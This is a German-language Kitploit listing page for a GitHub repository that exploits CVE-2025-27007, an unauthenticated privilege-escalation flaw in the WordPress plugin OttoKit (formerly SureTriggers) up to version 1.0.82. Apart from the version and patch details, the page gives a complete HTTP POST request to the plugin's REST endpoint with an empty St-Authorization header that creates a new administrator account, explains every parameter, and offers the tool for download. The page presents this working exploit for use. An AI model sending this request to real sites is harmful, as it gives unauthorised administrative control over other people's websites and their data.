Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-27007-OttoKit-exploit — Ausnutzung von CVE-2025-27007, einer kritischen Schwachstelle zur Rechteausweitung ohne Authentifizierung im WordPress-Plugin OttoKit (ehemals SureTriggers). | Kitploit
Tools/GitHubGitHub/absholi7ly/cve-2025-27007-ottokit-exploit
Privilege EscalationSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsAuthentifizierungRed Teaming
GitHubabsholi7ly/cve-2025-27007-ottokit-exploit

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-27007-OttoKit-exploit

Ausnutzung von CVE-2025-27007, einer kritischen Schwachstelle zur Rechteausweitung ohne Authentifizierung im WordPress-Plugin OttoKit (ehemals SureTriggers).

Repository anzeigen
21vor 1 JahrNoch nicht geprüft

CVE-2025-27007: OttoKit (SureTriggers) Schwachstelle zur Privilegienerweiterung

Ausnutzung von CVE-2025-27007, einer kritischen Schwachstelle bei der unbefugten Privilegienerweiterung im OttoKit-Plugin (ehemals SureTriggers) für WordPress. Dieses Repository beschreibt, wie ein Angreifer auf einer verwundbaren WordPress-Seite ein Administratorkonto erstellen kann.

Betroffene Versionen

  • Alle Versionen von OttoKit (SureTriggers) ≤ 1.0.82.
  • Behoben in Version 1.0.83.

Bedingungen für die Ausnutzung

Die Schwachstelle kann unter den folgenden Umständen ausgenutzt werden:

  1. OttoKit muss auf der Ziel-WordPress-Seite installiert und aktiviert sein.
  2. Das Plugin ist nicht initialisiert (z. B. ist kein API-Schlüssel oder „secret_key” in der Datenbank gesetzt).
  3. Die Ziel-Seite stellt den REST-API-Endpunkt '/wp-json/sure-triggers/v1/automation/action' bereit.

HTTP-Anfrage

Die folgende Anfrage zielt auf den Endpunkt /wp-json/sure-triggers/v1/automation/action, um ein Administratorkonto zu erstellen:

root@kitploit:~
POST /wp-json/sure-triggers/v1/automation/action HTTP/1.1
Host: [target-site]
Content-Type: application/x-www-form-urlencoded
St-Authorization: 
Content-Length: [length]

selected_options[user_name]=new_admin&selected_options[user_email][email protected]&selected_options[password]=StrongP@ssw0rd123&selected_options[role]=administrator&aintegration=WordPress&type_event=create_user_if_not_exists


Erläuterung der Anfrage

  • Endpoint: POST /wp-json/sure-triggers/v1/automation/action

  • St-Authorization: (leer): Umgeht die Authentifizierung, wenn das Plugin nicht konfiguriert ist.

  • selected_options[user_name]: Benutzername für das neue Konto (z. B. new_admin).

  • selected_options[user_email]: E-Mail-Adresse für das neue Konto (z. B. [email protected]).

  • selected_options[password]: Passwort für das neue Konto (z. B. StrongP@ssw0rd123).

  • selected_options[role]: Auf administrator gesetzt, um volle Rechte zu gewähren.

  • type_event: Auf create_user_if_not_exists gesetzt, um die Benutzererstellung auszulösen.

Tool herunterladen